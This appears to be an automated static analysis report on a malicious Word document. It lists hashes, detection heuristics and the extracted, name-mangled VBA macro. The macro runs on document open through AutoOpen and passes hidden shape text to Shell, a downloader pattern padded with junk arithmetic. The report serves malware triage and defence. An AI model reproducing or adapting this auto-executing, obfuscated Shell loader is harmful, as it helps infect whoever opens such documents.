Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 030bdb203af8f404…

MALICIOUS

Office (OLE)

142.0 KB Created: 2018-12-06 21:05:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 0f5beaaa80379e3c479ee247d7b46d08 SHA-1: 319952145f7cb26915d108799e559f9fefa9736e SHA-256: 030bdb203af8f40494c286f1f5c8adfaff19fa96ddbdbaf0e8a2ed5e79520906
292 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.003 Windows Command Shell T1566.001 Spearphishing Attachment T1204.002 Malicious File

The sample contains VBA macros with an autoopen subroutine that triggers a Shell() call. This call is used to invoke cmd.exe with obfuscated arguments, indicating an attempt to download and execute a secondary payload. The presence of PowerShell references and the ClamAV detection further support its malicious nature as a downloader.

Heuristics 10

  • ClamAV: Doc.Downloader.Generic-6775363-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-6775363-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    hCndwi = Array(PrdORzDNI, djnTLFXlP, KzEGKrwpb, Interaction _
.Shell(spkVli, LJdSY), lkECPocrA)
   PfbDEhwBzBIjMccGYFcpP = 59935802 * CInt(240108314) + lzAjriZmSkpOVjfzRBkn + CLng(1063305 + Sgn(MnVUGojwWFvwSEhNJPcV) - 106937115 * 182349265) - OlracXOYzfFnMNWblDUOjT + Chr(OaRErULiPkBGjOOGaIh) * 326771826 / CStr(112061872) / (RVznnqRvNDuLczKT / 146851802 / mApCLGnMXzuGCV / Fix(BJwEEjUNUXzMXlO + Hex(GldLQXOKszbTUBGBYDbqOPRX) + 118170583 + CBool(260911905 + fNuPaIBoUZKsiumLEF)))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Attribute VB_Customizable = True
Sub autoopen()
imZGF
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 8128 bytes
SHA-256: 6c036c0611514af8774b2ef19085aaadd3a2731f37de47ae953443cb32363a0a
Detection
ClamAV: No threats found
Obfuscation or payload: likely
189 of 228 identifiers look randomly generated (e.g. 'kGcrMJGKozXGJEOVBjzdwwon') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "CZUEIrDozq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub autoopen()
imZGF
End Sub

Attribute VB_Name = "WrVoJYGUkRcbrv"
Function imZGF()
On Error Resume Next
   cHVkouwkTtmJSERmHFEWkrL = 112780268 * CInt(325952913) + RTastamdvmpoAcKnhtYX + CLng(51474570 + Sgn(wiGjCwHlvEnLddKaAMXoJiz) - 123760977 * 31606888) - MwJSsaUXUrlJXnWJqkB + Chr(zhcHsLATjTlniamKccMNqF) * 55215353 / CStr(125425865) / (qojSAoNRQcfUBajZBnBGzf / 327214990 / LjNYoztYJRBWQB / Fix(fXWOzHqaCfnpRHMrLriGU + Hex(ocSiGKkYJIAEViaQzuU) + 38329286 + CBool(74333231 + BIcRzZpfiuPFiuwPAjqiVip)))
   jjBsZbkpFQrMjJA = 231896161 * CInt(6225348) + DdISnfmTnQEZVBdaVnvoDd + CLng(61797897 + Sgn(YNibCpuJKwSQzOwVFG) - 259290350 * 130129230) - fvpjJnMoMkZUmuZBLRwVv + Chr(WjMaHrZjwqplsSost) * 10888114 / CStr(223274351) / (wNswNUWUtpowpRZGWi / 211040758 / OdnjiABHMSYznaPIrQ / Fix(nVFpHBrwbsiWKVMG + Hex(ZJRMSOHaQrKPBQOFWs) + 4910382 + CBool(59305201 + fhnEaPiwObbTviiwAUGwOr)))
   mfjAYMMAatbjAZmhzYBEA = 305436133 * CInt(238824508) + sCaKjQFJBjHNwBkdwDDwOtq + CLng(173829035 + Sgn(zbOizksvnHVmBUJo) - 119326581 * 219889998) - RZlwnYHwrnizMAAjp + Chr(iDzPSItOrujtIwLZIkLiaGq) * 258361667 / CStr(6188455) / (JIJmBkTzndQCGcC / 165226300 / MNziinmrQXKQXNMOKzlFF / Fix(waLIhJFdjcBZiZDdaUWukNI + Hex(PQEowcRTcSPXTZFdlmni) + 100512050 + CBool(331991534 + nKhZQiKIlRftRFRhHKhzL)))
   GuzwhYEqrIuBopizoZM = 83131832 * CInt(222322938) + hUjljRjrLoXThBKCIOP + CLng(312881433 + Sgn(DZiGCamjvRYtfMdPv) - 290718955 * 257147923) - zzFiVHdmmQwzmJi + Chr(FfdqwIPXzZCphmNWcoRFTAlu) * 325804399 / CStr(575257) / (iTaHVhhKQOwKrhiiwEoEzDbV / 329939080 / ZbFuitwLlEYShHzcwIfdZXl / Fix(pqJvwarFJcHGFWfDNf + Hex(iGdXjFXHTpUSBqjEsjBPLNTJ) + 29001270 + CBool(341197270 + XaccQubHPLScqZTXPoKGPVR)))
Set JBOtIwZZ = CZUEIrDozq.Shapes(RhRdOD + "kcaQzBlwMQRdw" + lRJdG).TextFrame
   ozDMZIiwHJIidKZJalE = 177704175 * CInt(161240519) + YHDGUDEwkzKYpTjbb + CLng(340647733 + Sgn(cWMHhzVWkpGAQBZZw) - 61368719 * 125346448) - frKYIXEUGczKEIvsLzVGzh + Chr(GiwuXPukSIMnlLnzJu) * 3410189 / CStr(103508440) / (qwwHFhNwnMozXEu / 63976294 / hFMrhBsUKhYAMLwRLQiC / Fix(RijnivXpNHtpfNvDQJuEnv + Hex(pwbApfMnMHrPWfEDGUfzaiKj) + 333504916 + CBool(21165402 + uHowzWirqCuiKBTji)))
   iXCJfTRHtUGYivadfdqjGGu = 288259041 * CInt(307528082) + KBloKDjkPEiRav + CLng(245749927 + Sgn(ddlPzUZiwBVpnYdLPd) - 56372149 * 103056269) - FJDozfVzNDvwlcQGfC + Chr(cDrJiuzrbTCwnVwXUiaBoD) * 230341493 / CStr(230863599) / (arBvMEjbSnSOAUuAoujKHHcn / 33838050 / XFACZUIKICvvOOTUUifJTNfA / Fix(ICYrSOOqQjiaQOwFqMrFsfSr + Hex(nuHvcKZACQRkSpojFwhotE) + 134560826 + CBool(222949161 + dBnuHdkjEfTHun)))
   zSOZEEjjlcOkUVwEB = 21828239 * CInt(177251945) + NQSpiLZzpbYJAQCOLv + CLng(107783247 + Sgn(lIIQmwvosupbYcBizZ) - 312062178 * 292930735) - krJDFkDThtFmFiFIBCfQ + Chr(HumzkYPTOmAXpBQwNhOrU) * 69042980 / CStr(3581762) / (oTuwazWPcvcwXGULoASHF / 99192481 / joJoVRYPzuCIRiTtR / Fix(lvuYUbHNDDUrtiZDN + Hex(QJAwDffCVwDjVHB) + 284697355 + CBool(131788548 + VHUijIOVvFBXiNRMcH)))
   jnIZwEkkzFczmBSMJEAIbji = 157265636 * CInt(307553598) + TiHItSqcMTpDuw + CLng(299691005 + Sgn(ivYQEXqUuCrnRzI) - 242912196 * 200054214) - kGcrMJGKozXGJEOVBjzdwwon + Chr(qaDKNLEYwMndrjOK) * 301920290 / CStr(226055209) / (wntnYwzZlAzoRpdViDzboTh / 70635102 / bsKzlTCOzqZzniOPlTYwYVn / Fix(NjGuGDdGivzDmZzj + Hex(ZUzDYvZlLCAJLUFFzlFNIHuM) + 130154690 + CBool(97405465 + jKcMTrBwBnKpkhJuAdwWbsw)))
   dMwuiCoNTUSLzRJMiAcXaSZr = 22623219 * CInt(156814433) + sfBjbrhaBNaqHVzR + CLng(333095226 + Sgn(LCQzSBVqXZKmFqKtwiR) - 243772437 * 285243264) - RqHwIJVCdBaSrVsvNz + Chr(kTHQPIkjOYOzNjrka) * 273229644 / CStr(129033559) / (LVVwILmwoAAVSWGzKasqYdG / 196136613 / CNlAkSGtFDOwKHDVl / Fix(NYtjrasazzdVhOriGwAwEiu + Hex(MTsBzToUmmtFVVWLHKT) + 58469621 + CBool(106231663 + VzHcAFUmnfdQTXhrafIIi)))
spkVli = JBOtIwZZ.ContainingRange + jpjSKVD + TpSamjJD + wUfzMtj + AajhoiL + QoMnYYXL + dLFojCrZ + HvzpcR + FjDMRnEN + nrQBim
   TsYlowHbwdiLjDhWiItOK = 340330830 * CInt(135493035) + QRFmMjrtUMEqEtXzY + CLng(167240119 + Sgn(olaUnHEzFcHaTYJ) - 142622982 * 151855541) - UPSllrUwrRpktplsjdpwRfH + Chr(mQMllSvXAFEJoDAjApQnI) * 134455163 / CStr(228214664) / (oasfjacpHjwViiNYV / 118622401 / olbEddGwbOUaShvwKaQra / Fix(OBEEfFRcrSqkujNWPBZd + Hex(anJjnjlCwEaIKW) + 169218979 + CBool(3545037 + wBfzWCkhnOjoKORzdnO)))
   GvlozKTunPtFMmuWwjviQfm = 27532574 * CInt(68176148) + XiAivsaspfSKTHRiRSSi + CLng(315126694 + Sgn(jtlnCWdbIhdQnluJUAi) - 134760365 * 319390026) - DlMnNiNUlfkzzHsHq + Chr(OOWljCTfnIwRzb) * 188599436 / CStr(127234473) / (AbOJvOovzfpmnQMJaFitRF / 63151426 / huFVUfJVfRsjcuSAiq / Fix(WitzrmHZVuaXvRucAISaR + Hex(UGWYfhfmiKbWmpouOi) + 82979822 + CBool(41935384 + aFtzOiSSrPPRAJmdSGatiM)))
   tzcjcVZrBiKEXGQC = 182438009 * CInt(185132772) + pwtzbZzFswQGwTfPL + CLng(34232849 + Sgn(jkaPdUPZRNpAcTCiOAAAJfQj) - 308195484 * 244493247) - OlsrFzcsiOhPiMAfrD + Chr(nntoQPKEoEUuUszAoZWjCzaY) * 103269994 / CStr(216057027) / (WoJzYdwzkVwbcusooKUNW / 217393985 / MGVTtoMVZjioQfEw / Fix(VvMfrzupJLlNuTOpc + Hex(tDJEJXAXrzFcIkNDrbUjVIbi) + 235337708 + CBool(188213336 + HiQPzoiLtHRlpfTGwjh)))
   CpWihdBoGiuzoFOUi = 324454627 * CInt(258480462) + FTVrFjJniSfkKzUqT + CLng(272661242 + Sgn(olHKPzqjWEOitZqNjTi) - 161483213 * 4877756) - OKozJopkYApXwfwIFs + Chr(AnjQnmLTmlWoQYUXw) * 147520629 / CStr(106811865) / (CrmjNpVaLObOmJAjiuAMwU / 18423362 / BMYzdHBmpCMJBDCwQkIXJICH / Fix(otCVDrhomiBRWwDMpYk + Hex(qfbsCwNMfptKRapOzQmKfVOZ) + 6285730 + CBool(219481071 + oELUjRKhISKTGdVJzkrAvHp)))
   OdtddfuBzquahwlSHYmG = 256877103 * CInt(32764438) + wSzDTikmOaYQQJwvbsmf + CLng(260689117 + Sgn(jtUrdwTAUrJAwKfcaXNDjzJj) - 132103366 * 63144259) - cKNAZozmEjcBlTOG + Chr(HQMmQzRPRkRjjoXTnqpG) * 285580027 / CStr(234297286) / (zYatwVbkRtdZDzYM / 71911987 / kIEiFVuFhwcYzpXEOOpGTtpz / Fix(nGOTWOiiKGbGPSFwsodHstoB + Hex(iKWEcrSFiROjmLjzupiwzwvk) + 55104970 + CBool(178294077 + MsHuSNUnEIaiPIB)))
Const LJdSY = 0
   TUncwNZputpilWowXRXOGok = 287063158 * CInt(333139107) + YNQOXEkGvjpNJPwdl + CLng(16701408 + Sgn(qdQiTbSzGnfjvdi) - 269061236 * 78525445) - jWlwfbHHJIHQdDijImH + Chr(wmEHdTQztjbamEEjWrzp) * 177633396 / CStr(81565901) / (KppKbBMVvhhctSdUL / 68696055 / OZjjiYwCMQpRDkVt / Fix(nJovhOjtFbLNtWlfQ + Hex(siILldwzEGQdsYYLhCVOjLAn) + 164873994 + CBool(320663334 + oTuDlnldPJcXLziJacbjnp)))
   GsHJzMhnEstVYMzOiof = 147450416 * CInt(332822497) + dwWoPKowGVaTqAkBsEl + CLng(70781130 + Sgn(KUTDNziTlOBdfO) - 72062978 * 259070792) - zXzHmYvEVzdjwbkn + Chr(ScDkBKJcUGZqLlZOjGO) * 73816153 / CStr(294670667) / (wYzrABnpmQpDwikbvMq / 200090584 / RVOKODSQUWcitjilK / Fix(HpfTJBIordEKBUOG + Hex(CkhlzUYStMVCCFqlBiom) + 327502279 + CBool(84911882 + CZMoMKUHUnBcAdYK)))
   sfjkDzjSfDKpbsLuEiCD = 250364719 * CInt(335308999) + OPzqfwBDMLkGTEUQcDC + CLng(108565747 + Sgn(cAGbbHuoviqtGSVGIEVdA) - 332060320 * 194273971) - lrqkRZAjirlPqODoGPQdtNN + Chr(zKUwjmhiWPqjRKWViHLPjF) * 103530898 / CStr(298688766) / (hXlhAwYiElHFBD / 315535025 / HsbYUXwtvvmCzFtv / Fix(wzPvwWQSENZPQjDPEZN + Hex(UjJarmEMWjzrMdDEjOKVKG) + 100826292 + CBool(66191230 + iiOimtfjGGRpoDKREv)))
hCndwi = Array(PrdORzDNI, djnTLFXlP, KzEGKrwpb, Interaction _
.Shell(spkVli, LJdSY), lkECPocrA)
   PfbDEhwBzBIjMccGYFcpP = 59935802 * CInt(240108314) + lzAjriZmSkpOVjfzRBkn + CLng(1063305 + Sgn(MnVUGojwWFvwSEhNJPcV) - 106937115 * 182349265) - OlracXOYzfFnMNWblDUOjT + Chr(OaRErULiPkBGjOOGaIh) * 326771826 / CStr(112061872) / (RVznnqRvNDuLczKT / 146851802 / mApCLGnMXzuGCV / Fix(BJwEEjUNUXzMXlO + Hex(GldLQXOKszbTUBGBYDbqOPRX) + 118170583 + CBool(260911905 + fNuPaIBoUZKsiumLEF)))
   amWDlVhhzpzVkGKjLRJrGT = 10206491 * CInt(313210345) + pLtRODVXsKnkRMHw + CLng(110125952 + Sgn(MTIrmqdLirNhHka) - 300273768 * 314814229) - oPlmdzrwWzuFCtpM + Chr(cBwZCnCUiJKCDJXQzKBVZp) * 68453483 / CStr(338813713) / (TiRdoTrvvwszklbiRzohuT / 275912148 / pFjoqPmqwjiJlrppTH / Fix(KfSMYZmIqVSvAou + Hex(jkDEfMBwBCSzZKzNmLfrWs) + 72187731 + CBool(99773776 + HwUjniUqDFEPDc)))
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.